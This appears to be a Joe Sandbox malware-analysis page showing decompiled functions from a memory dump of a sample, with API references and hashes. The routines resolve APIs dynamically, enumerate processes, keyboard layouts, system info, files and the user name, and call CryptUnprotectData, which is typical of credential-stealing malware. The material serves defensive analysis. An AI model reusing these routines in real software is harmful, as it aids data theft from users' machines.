0x0041e566
0x0041e568
0x00000000
0x00000000
0x0041e570
0x0041e57f
0x0041e582
0x0041e58a
0x0041e58d
0x0041e597
0x0041e5a5
0x0041e5ae
0x0041e5b7
0x0041e5c0
0x0041e5c3
0x0041e5cc
0x0041e5da
0x0041e5e2
0x0041e5ef
0x0041e5f2
0x0041e5f5
0x0041e600
0x0041e60e
0x0041e613
0x0041e623
0x0041e626
0x0041e629
0x0041e634
0x0041e63a
0x0041e642
0x0041e657
0x0041e661
0x0041e667
0x0041e66e
0x0041e672
0x0041e675
0x0041e678
0x0041e686
0x0041e68a
0x0041e692
0x0041e697
0x0041e699
0x0041e6bc
0x0041e6bf
0x0041e6c3
0x0041e6d4
0x0041e6d6
0x0041e6d9
0x0041e6df
0x0041e6e6
0x0041e6ed
0x0041e6ef
0x0041e6ff
0x0041e6ff
0x0041e706
0x0041e708
0x0041e716
0x0041e719
0x0041e71e
0x0041e71f
0x0041e71f
0x0041e721
0x0041e729
0x0041e72d
0x0041e72e
0x0041e72e
0x0041e73c
0x0041e73f
0x0041e73f
0x0041e741
0x0041e741
0x0041e74c
0x0041e751
0x0041e752
0x0041e753
0x0041e755
0x0041e755
0x0041e75c
0x0041e75e
0x0041e760
0x0041e767
0x0041e76f
0x0041e771
0x0041e776
0x0041e776
0x0041e776
0x0041e776
0x0041e767
0x0041e77a
0x0041e77c
0x0041e77e
0x0041e78e
0x0041e78e
0x0041e78e
0x00000000
0x0041e780
0x0041e780
0x0041e787
0x00000000
0x00000000
0x0041e78b
0x0041e790
0x0041e790
0x0041e797
0x0041e79a
0x0041e7c8
0x0041e7ce
0x0041e7ce
0x0041e7d0
0x0041e7d4
0x0041e7d9
0x0041e7df
0x0041e7e2
0x0041e7e5
0x0041e7e7
0x00000000
0x00000000
0x0041e7ed
0x0041e7ef
0x0041e6a2
0x0041e6a2
0x00000000
0x0041e6a2
0x0041e7fb
0x0041e7fe
0x0041e800
0x0041e806
0x0041e80f
0x0041e812
0x0041e816
0x0041e81c
0x0041e822
0x0041e8a9
0x0041e8a9
0x0041e8af
0x0041e8b6
0x0041e8c2
0x0041e8c4
0x0041e8ca
0x0041e8ca
0x0041e8cc
0x0041e8d2
0x0041e8d7
0x0041e8d9
0x00000000
0x00000000
0x0041e8e6
0x0041e8e6
0x0041e8e6
0x0041e8ea
0x0041e8f1
0x0041e8f1
0x0041e8f4
0x0041e8f6
0x00000000
0x00000000
0x0041e90a
0x0041e913
0x0041e918
0x0041e921
0x0041e92d
0x0041e938
0x0041e93d
0x0041e943
0x0041e945
0x0041e94e
0x0041e94e
0x0041e954
0x0041e957
0x00000000
0x00000000
0x0041e94c
0x0041e94c
0x0041e959
0x0041e95f
0x0041e95f
0x00000000
0x0041e95f
0x0041e947
0x00000000
0x0041e947
0x0041e8c6
0x0041e8c8
0x00000000
0x00000000
0x00000000
0x0041e8c8
0x0041e8b8
0x0041e8b8
0x00000000
0x0041e8b8
0x0041e828
0x0041e82a
0x0041e835
0x0041e835
0x0041e843
0x0041e84a
0x0041e851
0x0041e851
0x0041e851
0x0041e851
0x0041e865
0x0041e868
0x0041e871
0x0041e876
0x0041e878
0x0041e884
0x0041e886
0x0041e88c
0x0041e891
0x0041e893
0x00000000
0x00000000
0x0041e899
0x0041e89e
0x0041e8a3
0x0041e8a5
0x00000000
0x00000000
0x00000000
0x0041e87a
0x0041e87a
0x0041e87a
0x00000000
0x0041e87a
0x0041e878
0x0041e82c
0x0041e833
0x00000000
0x00000000
0x00000000
0x0041e833
0x0041e79c
0x0041e7a3
0x0041e7b5
0x0041e7bb
0x00000000
0x00000000
0x0041e7bf
0x0041e7c4
0x0041e7c4
0x00000000
0x0041e7c4
0x0041e7ae
0x00000000
0x0041e7ae
0x00000000
0x00000000
0x00000000
0x0041e6f1
0x0041e6f1
0x0041e6f1
0x0041e6f3
0x0041e6f5
0x00000000
0x00000000
0x0041e6f7
0x0041e6fc
0x0041e6fc
0x0041e6fd
0x00000000
0x00000000
0x00000000
0x0041e6fd
0x00000000
0x0041e6f1
0x0041e6c5
0x0041e6c7
0x0041e6cc
0x00000000
0x0041e6cc
0x0041e69b
0x0041e69d
0x00000000
0x0041e69d
0x0041e561
0x0041e442
0x0041e448
0x00000000
0x0041e448
0x0041e433
0x00000000
0x0041e433
0x0041e41c
0x0041e41e
0x00000000
0x0041e41e
0x0041e3f9
0x0041e3ff
0x0041e404
0x0041e406
0x00000000
0x00000000
0x00000000
0x0041e406
0x0041e3c5
0x0041e3cb
0x0041e3d1
0x0041e3d6
0x0041e3dd
0x00000000
0x00000000
0x00000000
0x0041e3dd
0x0041e357
0x0041e357
0x00000000
0x0041e357
0x0041e347
0x0041e347
0x0041e968
0x0041e976
0x0041e976

Strings

UT, xrefs: 0041E667

Memory Dump Source

Source File: 00000002.00000002.244915415.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.245003002.000000000045A000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_file.jbxd

Yara matches

Similarity

API ID:
String ID: UT
API String ID: 0-894488996
Opcode ID: 160155efdf1552cee5ec6a6d4314fe61abc19c32427b2e0563ecaf19adadf930
Instruction ID: 82d899cbc1dbfe57ebf528dbe7d114984a635e28714ae706daaca6a544e40441
Opcode Fuzzy Hash: 160155efdf1552cee5ec6a6d4314fe61abc19c32427b2e0563ecaf19adadf930
Instruction Fuzzy Hash: 68127DB5D002688BDF219F66C8807EEBBB5AF55304F0444EADD49AB242D7388EC5CF59

Uniqueness

Uniqueness Score: -1.00%

Function 0041A5D9 Relevance: 22.6, APIs: 15, Instructions: 70
libraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 92%

			E0041A5D9() {
				struct HINSTANCE__* _t1;
				struct HINSTANCE__* _t2;
				_Unknown_base(*)()* _t3;
				_Unknown_base(*)()* _t5;
				void* _t17;

				_t1 = LoadLibraryA( *0x446b34);
				 *0x44752c = _t1;
				if(_t1 != 0) {
					 *0x4474d4 = GetProcAddress(_t1,  *0x446c18);
					_t5 = GetProcAddress( *0x44752c,  *0x446ecc);
					 *0x447434 = _t5;
					 *0x4474e0 =  *_t5( *0x44752c,  *0x4471dc, _t17);
					 *0x447350 = GetProcAddress( *0x44752c,  *0x446d60);
					 *0x44747c = GetProcAddress( *0x44752c,  *0x446aa4);
					 *0x447444 = GetProcAddress( *0x44752c,  *0x447280);
					 *0x44755c = GetProcAddress( *0x44752c,  *0x446c40);
					 *0x447514 = GetProcAddress( *0x44752c,  *0x446da0);
					 *0x44748c = GetProcAddress( *0x44752c,  *0x446e7c);
					 *0x4473b4 = GetProcAddress( *0x44752c,  *0x447198);
					 *0x4474b4 = GetProcAddress( *0x44752c,  *0x447020);
					 *0x447488 = GetProcAddress( *0x44752c,  *0x446b18);
					 *0x4474b8 = GetProcAddress( *0x44752c,  *0x447254);
				}
				_t2 = LoadLibraryA( *0x447104); // executed
				 *0x447318 = _t2;
				if(_t2 != 0) {
					_t3 = GetProcAddress(_t2,  *0x447024);
					 *0x44740c = _t3;
					return _t3;
				}
				return _t2;
			}

0x0041a5df
0x0041a5e5
0x0041a5ec
0x0041a608
0x0041a613
0x0041a61b
0x0041a62e
0x0041a645
0x0041a65c
0x0041a673
0x0041a68a
0x0041a6a1
0x0041a6b8
0x0041a6cf
0x0041a6e6
0x0041a6fd
0x0041a70e
0x0041a713
0x0041a71a
0x0041a720
0x0041a727
0x0041a730
0x0041a736
0x00000000
0x0041a736
0x0041a73b

APIs

LoadLibraryA.KERNEL32(0040CD1A), ref: 0041A5DF
GetProcAddress.KERNEL32(00000000), ref: 0041A600
GetProcAddress.KERNEL32 ref: 0041A613
GetProcAddress.KERNEL32 ref: 0041A639
GetProcAddress.KERNEL32 ref: 0041A650
GetProcAddress.KERNEL32 ref: 0041A667
GetProcAddress.KERNEL32 ref: 0041A67E
GetProcAddress.KERNEL32 ref: 0041A695
GetProcAddress.KERNEL32 ref: 0041A6AC
GetProcAddress.KERNEL32 ref: 0041A6C3
GetProcAddress.KERNEL32 ref: 0041A6DA
GetProcAddress.KERNEL32 ref: 0041A6F1
GetProcAddress.KERNEL32 ref: 0041A708
LoadLibraryA.KERNEL32 ref: 0041A71A
GetProcAddress.KERNEL32(00000000), ref: 0041A730

Memory Dump Source

Source File: 00000002.00000002.244915415.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.245003002.000000000045A000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_file.jbxd

Yara matches

Similarity

API ID: AddressProc$LibraryLoad
String ID:
API String ID: 2238633743-0
Opcode ID: 8af417ad41aca21ee24e16363a89efd6187ac29e843684ea5d1e76fa02f2cbb9
Instruction ID: ee773310bd8116f289e524c6cdde255bac6c0a5c7f487da91d89d1110249169e
Opcode Fuzzy Hash: 8af417ad41aca21ee24e16363a89efd6187ac29e843684ea5d1e76fa02f2cbb9
Instruction Fuzzy Hash: EB311BBD90A200AFDB025FA5FD088747FB6F70B3513514075EA0586632DB36482AEF9D

Uniqueness

Uniqueness Score: -1.00%

Function 0041754C Relevance: 19.3, APIs: 10, Strings: 1, Instructions: 77
memoryCOMMON

Download Yara Rule

C-Code - Quality: 86%

			E0041754C() {
				signed int _v8;
				char _v520;
				void* _v524;
				int _v528;
				int _v532;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t19;
				int _t23;
				int _t26;
				void* _t38;
				void* _t41;
				signed int _t42;
				signed int _t44;
				void* _t45;
				void* _t46;

				_t19 =  *0x444664; // 0xfa3a0753
				_v8 = _t19 ^ _t44;
				_t42 = 0;
				_v524 = HeapAlloc(GetProcessHeap(), 0, 0x1f4);
				_v528 = 0;
				_t23 = GetKeyboardLayoutList(0, 0);
				_t43 = _t23;
				_t38 = LocalAlloc(0x40, _t23 << 2);
				_t26 = GetKeyboardLayoutList(_t23, _t38);
				_v532 = _t26;
				if(_t26 != 0) {
					_t43 = 0x200;
					do {
						GetLocaleInfoA( *(_t38 + _t42 * 4) & 0x0000ffff, 2,  &_v520, _t43); // executed
						_push( &_v520);
						if(_v528 == 0) {
							wsprintfA(_v524, "%s");
							_t46 = _t45 + 0xc;
						} else {
							_push(_v524);
							wsprintfA(_v524, "%s / %s");
							_t46 = _t45 + 0x10;
						}
						_v528 = _v528 + 1;
						E0041F6B0( &_v520, 0, _t43);
						_t45 = _t46 + 0xc;
						_t42 = _t42 + 1;
					} while (_t42 < _v532);
				}
				if(_t38 != 0) {
					LocalFree(_t38);
				}
				return E0041F69E(_v524, _t38, _v8 ^ _t44, _t41, _t42, _t43);
			}

0x00417555
0x0041755c
0x00417567
0x00417579
0x0041757f
0x00417585
0x0041758b
0x00417599
0x0041759d
0x004175a3
0x004175ab
0x004175ad
0x004175b2
0x004175c1
0x004175d4
0x004175d5
0x004175fe
0x00417604
0x004175d7
0x004175d7
0x004175e8
0x004175ee
0x004175ee
0x00417607
0x00417617
0x0041761c
0x0041761f
0x00417620
0x004175b2
0x0041762a
0x0041762d
0x0041762d
0x00417647

APIs

GetProcessHeap.KERNEL32(00000000,000001F4,0043D130,00000000,?), ref: 0041756A
HeapAlloc.KERNEL32(00000000), ref: 00417571
GetKeyboardLayoutList.USER32(00000000,00000000), ref: 00417585
LocalAlloc.KERNEL32(00000040,00000000), ref: 00417593
GetKeyboardLayoutList.USER32(00000000,00000000), ref: 0041759D
GetLocaleInfoA.KERNEL32(?,00000002,?,00000200), ref: 004175C1
wsprintfA.USER32 ref: 004175E8
wsprintfA.USER32 ref: 004175FE
_memset.LIBCMT ref: 00417617
LocalFree.KERNEL32(00000000), ref: 0041762D

Strings

%s / %s, xrefs: 004175DD

Memory Dump Source

Source File: 00000002.00000002.244915415.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.245003002.000000000045A000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_file.jbxd

Yara matches

Similarity

API ID: AllocHeapKeyboardLayoutListLocalwsprintf$FreeInfoLocaleProcess_memset
String ID: %s / %s
API String ID: 2849719339-2910687431
Opcode ID: f5b86ff253d8aba314c59d0f196d7771db9a1f99ade358fbb2cc61f0b889726c
Instruction ID: 77d9aa87f6391e73b126c0b3f5d87b04659bb4feb9e9b92b89ac1f4531cb612f
Opcode Fuzzy Hash: f5b86ff253d8aba314c59d0f196d7771db9a1f99ade358fbb2cc61f0b889726c
Instruction Fuzzy Hash: 64218E75904318ABDB209F65DC4DFAA7B78EB45305F1000F5F919A2162DB388E86CFA8

Uniqueness

Uniqueness Score: -1.00%

Function 00417648 Relevance: 15.1, APIs: 10, Instructions: 53
stringprocessCOMMON

Download Yara Rule

C-Code - Quality: 42%

			E00417648(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags) {
				void* _t15;
				int _t17;
				intOrPtr* _t26;
				void* _t33;
				void* _t35;
				void* _t36;
				void* _t37;

				_t36 = __esi;
				_t33 = __edx;
				_t30 = __ebx;
				_push(0x14c);
				E00423679(E00433DA7, __ebx, __edi, __esi);
				 *(_t37 - 0x158) = 0x128;
				_t15 = CreateToolhelp32Snapshot(2, 0); // executed
				_t35 = _t15;
				_t17 = Process32First(_t35, _t37 - 0x158); // executed
				if(_t17 != 0) {
					while(Process32Next(_t35, _t37 - 0x158) != 0) {
						 *0x4474e0(_t36, "- ");
						 *0x4474e0(_t36, _t37 - 0x134);
						 *0x4474e0(_t36, " [");
						_push( *((intOrPtr*)(_t37 - 0x150)));
						_t26 = E00417C07(_t30, _t37 - 0x2c, _t33, _t35, _t36, __eflags);
						 *(_t37 - 4) =  *(_t37 - 4) & 0x00000000;
						__eflags =  *((intOrPtr*)(_t26 + 0x14)) - 0x10;
						if( *((intOrPtr*)(_t26 + 0x14)) >= 0x10) {
							_t26 =  *_t26;
						}
						 *0x4474e0(_t36, _t26);
						_t9 = _t37 - 4;
						 *_t9 =  *(_t37 - 4) | 0xffffffff;
						__eflags =  *_t9;
						E00404A66(_t37 - 0x2c, 1, 0);
						 *0x4474e0(_t36, "]\n");
					}
				}
				CloseHandle(_t35);
				return E004236C3(_t30, _t35, _t36);
			}

0x00417648
0x00417648
0x00417648
0x00417648
0x00417652
0x0041765b
0x00417665
0x0041766b
0x00417675
0x0041767d
0x004176e5
0x00417687
0x00417695
0x004176a1
0x004176a7
0x004176b0
0x004176b5
0x004176b9
0x004176bd
0x004176bf
0x004176bf
0x004176c3
0x004176c9
0x004176c9
0x004176c9
0x004176d4
0x004176df
0x004176df
0x004176e5
0x004176f8
0x00417703

APIs

__EH_prolog3_GS.LIBCMT ref: 00417652
CreateToolhelp32Snapshot.KERNEL32 ref: 00417665
Process32First.KERNEL32(00000000,00000128), ref: 00417675
lstrcat.KERNEL32(?,0043FFA0), ref: 00417687
lstrcat.KERNEL32(?,?), ref: 00417695
lstrcat.KERNEL32(?,0043F4DC), ref: 004176A1
lstrcat.KERNEL32(?,00000000), ref: 004176C3
lstrcat.KERNEL32(?,0043F4E0), ref: 004176DF
Process32Next.KERNEL32(00000000,00000128), ref: 004176ED
CloseHandle.KERNEL32(00000000), ref: 004176F8

Memory Dump Source

Source File: 00000002.00000002.244915415.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.245003002.000000000045A000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_file.jbxd

Yara matches

Similarity

API ID: lstrcat$Process32$CloseCreateFirstH_prolog3_HandleNextSnapshotToolhelp32
String ID:
API String ID: 4202092735-0
Opcode ID: b378928394991123b32e4fc733392246524ee61ce1c954973f3cbdae9b580ebc
Instruction ID: de179e69499fdc3028ae4ec548ef72240ffc523ab7e1efa0dd8785b8c8c906e2
Opcode Fuzzy Hash: b378928394991123b32e4fc733392246524ee61ce1c954973f3cbdae9b580ebc
Instruction Fuzzy Hash: BE118F34504504ABEB219B60DD09BEE3B78EF46715F200066F511A61A0CB785A468B6D

Uniqueness

Uniqueness Score: -1.00%

Function 004174A0 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 54
timeCOMMON

Download Yara Rule

C-Code - Quality: 32%

			E004174A0(void* __ebx, void* __ecx, void* __edx, void* __edi, void* __esi, void* __eflags, signed int __fp0) {
				void* _t30;
				void* _t36;
				void* _t38;
				void* _t43;
				signed int* _t44;
				void* _t46;

				_t46 = __eflags;
				_t38 = __edx;
				_t36 = __ecx;
				E00423679(E00433DD7, __ebx, __edi, __esi);
				 *(_t43 - 0x108) =  *(_t43 - 0x108) & 0x00000000;
				 *(_t43 - 0x24) = 0;
				asm("stosd");
				asm("stosd");
				asm("stosd");
				asm("stosw");
				GetSystemTime(_t43 - 0x24);
				GetTimeZoneInformation(_t43 - 0x104); // executed
				 *((short*)(_t43 - 0x34)) = 0;
				asm("stosd");
				asm("stosd");
				asm("stosd");
				asm("stosw");
				 *0x447590(_t43 - 0x104, _t43 - 0x24, _t43 - 0x34, 0xfc); // executed
				_push(_t36);
				asm("fild dword [ebp-0x104]");
				asm("fchs");
				 *(_t43 - 0x108) = __fp0 /  *0x440188;
				 *_t44 =  *(_t43 - 0x108);
				_push(_t43 - 0x50); // executed
				_t30 = E00417E1F(__ebx, _t38, _t43 - 0x32, __esi, _t46); // executed
				 *(_t43 - 4) =  *(_t43 - 4) & 0x00000000;
				E00404DB2(_t36, __esi, "UTC", _t30);
				E00404A66(_t43 - 0x50, 1, 0);
				return E004236C3(__ebx, _t43 - 0x32, __esi);
			}

0x004174a0
0x004174a0
0x004174a0
0x004174aa
0x004174af
0x004174b8
0x004174bf
0x004174c0
0x004174c1
0x004174c2
0x004174c8
0x004174d5
0x004174dd
0x004174e4
0x004174e5
0x004174e6
0x004174e7
0x004174f8
0x004174fe
0x004174ff
0x0041750e
0x00417510
0x0041751c
0x0041751f
0x00417520
0x00417525
0x00417530
0x0041753f
0x0041754b

APIs

__EH_prolog3_GS.LIBCMT ref: 004174AA
GetSystemTime.KERNEL32(?), ref: 004174C8
GetTimeZoneInformation.KERNEL32(?), ref: 004174D5
TzSpecificLocalTimeToSystemTime.KERNEL32(?,?,?), ref: 004174F8

Part of subcall function 00417E1F: __EH_prolog3.LIBCMT ref: 00417E29
Part of subcall function 00417E1F: std::ios_base::_Ios_base_dtor.LIBCPMT ref: 00417ECA

Part of subcall function 00404DB2: _strlen.LIBCMT ref: 00404DBF

Part of subcall function 00404A66: _memmove.LIBCMT ref: 00404A86

Strings

UTC, xrefs: 0041752A

Memory Dump Source

Source File: 00000002.00000002.244915415.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.245003002.000000000045A000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_file.jbxd

Yara matches

Similarity

API ID: Time$System$H_prolog3H_prolog3_InformationIos_base_dtorLocalSpecificZone_memmove_strlenstd::ios_base::_
String ID: UTC
API String ID: 255732681-2754919731
Opcode ID: f76cd0d312de1046cc59c804b91fa685a5006c755051ebd7674b3fca4e8cae1c
Instruction ID: cd0c0340c318fe306ed2f31c9e93085f297a25a470ece7927e8a31ac355850ec
Opcode Fuzzy Hash: f76cd0d312de1046cc59c804b91fa685a5006c755051ebd7674b3fca4e8cae1c
Instruction Fuzzy Hash: 2A11AC71900508FFDB50DBF4DD49BCEB7B8AF58305F1004A6E244F6050DBB89B948B19

Uniqueness

Uniqueness Score: -1.00%

Function 0040F7E5 Relevance: 6.0, APIs: 4, Instructions: 44
memoryencryptionCOMMON

Download Yara Rule

C-Code - Quality: 68%

			E0040F7E5(intOrPtr __eax, long* __edi, char _a4, void** _a8) {
				void* _v8;
				long _v12;
				intOrPtr _v16;
				char _v20;
				void* _t16;
				long _t19;
				void* _t20;
				void* _t22;

				_v16 = __eax;
				_v20 = _a4;
				_t16 =  *0x4473e8( &_v20, 0, 0, 0, 0, 0,  &_v12); // executed
				_t22 = _t16;
				if(_t22 != 0) {
					_t19 = _v12;
					 *__edi = _t19;
					_t20 = LocalAlloc(0x40, _t19);
					 *_a8 = _t20;
					if(_t20 != 0) {
						E0041F8C0(_t20, _v8,  *__edi);
					}
				}
				return LocalFree(_v8) & 0xffffff00 | _t22 != 0x00000000;
			}

0x0040f7ed
0x0040f7f3
0x0040f805
0x0040f80b
0x0040f80f
0x0040f811
0x0040f817
0x0040f819
0x0040f822
0x0040f826
0x0040f82e
0x0040f833
0x0040f826
0x0040f847

APIs

CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000000,-000000F6), ref: 0040F805
LocalAlloc.KERNEL32(00000040,-000000F6,?,0040F9F2,-000000F6,00000000,0043F728,00000000,-00000010,?,?,?,0040939F,?,?), ref: 0040F819
_memmove.LIBCMT ref: 0040F82E
LocalFree.KERNEL32(00000000,?,0040F9F2,-000000F6,00000000,0043F728,00000000,-00000010,?,?,?,0040939F,?,?), ref: 0040F839

Memory Dump Source

Source File: 00000002.00000002.244915415.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.245003002.000000000045A000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_file.jbxd

Yara matches

Similarity

API ID: Local$AllocCryptDataFreeUnprotect_memmove
String ID:
API String ID: 3008826695-0
Opcode ID: e3ca95692ff2a63c7aee310c5ee2f583995b92c69a30e38ec14e371d8990c88a
Instruction ID: aa2e8d94fb19392563f4045c689a3a704efdce5b6ceadc072f9dc633b1e6c38b
Opcode Fuzzy Hash: e3ca95692ff2a63c7aee310c5ee2f583995b92c69a30e38ec14e371d8990c88a
Instruction Fuzzy Hash: F0F03176900218BFCB10AFE4DC858DEBB7CEB08750B104472E901E7250E3755A55CB94

Uniqueness

Uniqueness Score: -1.00%

Function 00417F60 Relevance: 4.6, APIs: 3, Instructions: 66
fileCOMMON

Download Yara Rule

C-Code - Quality: 85%

			E00417F60(intOrPtr* __ebx, void* __edi, void* __esi, void* __eflags) {
				WCHAR* _t29;
				void* _t30;
				intOrPtr* _t45;
				void* _t63;

				_t45 = __ebx;
				_push(0x298);
				E00423679(E00433A84, __ebx, __edi, __esi);
				 *(_t63 - 0x2a0) =  *(_t63 - 0x2a0) & 0x00000000;
				 *((intOrPtr*)(_t63 - 0x2a4)) = __ebx;
				 *((intOrPtr*)(_t63 - 4)) = 1;
				_t29 = E00417DAA(_t63 + 8, _t63 - 0x48);
				_t65 = _t29[0xa] - 8;
				if(_t29[0xa] >= 8) {
					_t29 =  *_t29;
				}
				_t30 = FindFirstFileW(_t29, _t63 - 0x298); // executed
				 *(_t63 - 0x29c) = _t30;
				E0040CE40(0, _t63 - 0x48, 1);
				 *_t45 = 0;
				 *((intOrPtr*)(_t45 + 4)) = 0;
				 *((intOrPtr*)(_t45 + 8)) = 0;
				_t58 = _t63 - 0x2c;
				 *(_t63 - 0x2a0) = 1;
				E004177A0(_t63 - 0x2c, _t63 - 0x26c);
				 *((char*)(_t63 - 4)) = 2;
				E00418E47(_t45, _t58, 1, _t45, _t65);
				_push(1);
				while(1) {
					_t60 = _t63 - 0x2c;
					 *((char*)(_t63 - 4)) = 1;
					E0040CE40(0, _t63 - 0x2c);
					if(FindNextFileW( *(_t63 - 0x29c), _t63 - 0x298) == 0) {
						break;
					}
					_t61 = _t63 - 0x2c;
					E004177A0(_t63 - 0x2c, _t63 - 0x26c);
					 *((char*)(_t63 - 4)) = 3;
					E00418E47(_t45, _t61, 0, _t45, __eflags);
					_push(1);
				}
				E00404A66(_t63 + 8, 1, _t38);
				return E004236C3(_t45, 0, _t60);
			}

0x00417f60
0x00417f60
0x00417f6a
0x00417f6f
0x00417f76
0x00417f86
0x00417f89
0x00417f8e
0x00417f92
0x00417f94
0x00417f94
0x00417f9e
0x00417faa
0x00417fb0
0x00417fb7
0x00417fb9
0x00417fbc
0x00417fc7
0x00417fca
0x00417fd0
0x00417fd9
0x00417fdd
0x00417fe2
0x00418003
0x00418005
0x00418008
0x0041800c
0x00418026
0x00000000
0x00000000
0x00417fec
0x00417fef
0x00417ff8
0x00417ffc
0x00418001
0x00418001
0x0041802e
0x0041803a

APIs

__EH_prolog3_GS.LIBCMT ref: 00417F6A

Part of subcall function 00417DAA: MultiByteToWideChar.KERNEL32(00000000,00000000,?,?,00000000,00000000,00000000,00000000,00000104,?,?,?,00408FFE,?,?), ref: 00417DCB
Part of subcall function 00417DAA: MultiByteToWideChar.KERNEL32(00000000,00000000,?,?,00000000,?,?,?,?,00408FFE,?,?,?,?,?,0040939F), ref: 00417DFC

FindFirstFileW.KERNEL32(00000000,?,0041221C), ref: 00417F9E
FindNextFileW.KERNEL32(?,?,00000001,?,00000001), ref: 0041801E

Part of subcall function 004177A0: _wcslen.LIBCMT ref: 004177B6

Part of subcall function 00418E47: __EH_prolog3.LIBCMT ref: 00418E4E

Memory Dump Source

Source File: 00000002.00000002.244915415.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.245003002.000000000045A000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_file.jbxd

Yara matches

Similarity

API ID: ByteCharFileFindMultiWide$FirstH_prolog3H_prolog3_Next_wcslen
String ID:
API String ID: 421274865-0
Opcode ID: 024daa8a7d9d685fb4ef6773e4565a0d6818ffa9fc287c29f0ef14fc9cb3f322
Instruction ID: a1dcd8850e2972076c3b89189c48140569735b81a72afe27f2a6394e0016f171
Opcode Fuzzy Hash: 024daa8a7d9d685fb4ef6773e4565a0d6818ffa9fc287c29f0ef14fc9cb3f322
Instruction Fuzzy Hash: C92160719001289FDB11EF65CC49BDEBBB8AF45304F0441AEE409E7141DB789B85CB95

Uniqueness

Uniqueness Score: -1.00%

Function 00416CDA Relevance: 3.0, APIs: 2, Instructions: 24
COMMON

Download Yara Rule

C-Code - Quality: 92%

			E00416CDA(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags) {
				intOrPtr* _t13;
				void* _t22;
				void* _t23;
				void* _t25;
				void* _t26;

				_t26 = __eflags;
				_t24 = __esi;
				_t23 = __edi;
				_t22 = __edx;
				_t18 = __ebx;
				_push(0x4c);
				E00423679(E00433E4F, __ebx, __edi, __esi);
				 *(_t25 - 0x30) =  *(_t25 - 0x30) & 0x00000000;
				GetSystemInfo(_t25 - 0x54); // executed
				_t13 = E00417C07(__ebx, _t25 - 0x2c, _t22, __edi, __esi, _t26,  *((intOrPtr*)(_t25 - 0x40))); // executed
				 *(_t25 - 4) =  *(_t25 - 4) & 0x00000000;
				if( *((intOrPtr*)(_t13 + 0x14)) >= 0x10) {
					_t13 =  *_t13;
				}
				E004049CF(_t23, _t13);
				E00404A66(_t25 - 0x2c, 1, 0);
				return E004236C3(_t18, _t23, _t24);
			}

0x00416cda
0x00416cda
0x00416cda
0x00416cda
0x00416cda
0x00416cda
0x00416ce1
0x00416ce6
0x00416cee
0x00416cfa
0x00416cff
0x00416d07
0x00416d09
0x00416d09
0x00416d0e
0x00416d1a
0x00416d26

APIs

__EH_prolog3_GS.LIBCMT ref: 00416CE1
GetSystemInfo.KERNEL32(?,?,?,?,?,?,0000004C,0040C0E5,?,?,?,004341E4,000000FF), ref: 00416CEE

Part of subcall function 00417C07: __EH_prolog3_GS.LIBCMT ref: 00417C11
Part of subcall function 00417C07: std::ios_base::_Ios_base_dtor.LIBCPMT ref: 00417D14

Memory Dump Source

Source File: 00000002.00000002.244915415.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.245003002.000000000045A000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_file.jbxd

Yara matches

Similarity

API ID: H_prolog3_$InfoIos_base_dtorSystemstd::ios_base::_
String ID:
API String ID: 881831149-0
Opcode ID: 2a56f503fb0f4fb07915438d4dc9f9149f479777a80e1488413c7e5ee6005911
Instruction ID: 3a8985c8db6979cbde54c5c956cc6daa65aa627a5291fba031a07a1008c57fab
Opcode Fuzzy Hash: 2a56f503fb0f4fb07915438d4dc9f9149f479777a80e1488413c7e5ee6005911
Instruction Fuzzy Hash: 7BF03071A10104AFDB05EFA4E84ABEC7275EF44706F504029F101AB1D1CB7C8A09CB59

Uniqueness

Uniqueness Score: -1.00%

Function 0041717C Relevance: 1.5, APIs: 1, Instructions: 18
COMMON

Download Yara Rule

C-Code - Quality: 86%

			E0041717C() {
				signed int _v8;
				char _v268;
				long _v272;
				signed int _t7;
				intOrPtr _t14;
				intOrPtr _t17;
				intOrPtr _t18;
				intOrPtr _t19;
				signed int _t20;

				_t7 =  *0x444664; // 0xfa3a0753
				_v8 = _t7 ^ _t20;
				_v272 = 0x101;
				GetUserNameA( &_v268,  &_v272); // executed
				return E0041F69E( &_v268, _t14, _v8 ^ _t20, _t17, _t18, _t19);
			}

0x00417185
0x0041718c
0x0041719d
0x004171a7
0x004171be

APIs

GetUserNameA.ADVAPI32(?,?), ref: 004171A7

Memory Dump Source

Source File: 00000002.00000002.244915415.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.245003002.000000000045A000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_file.jbxd

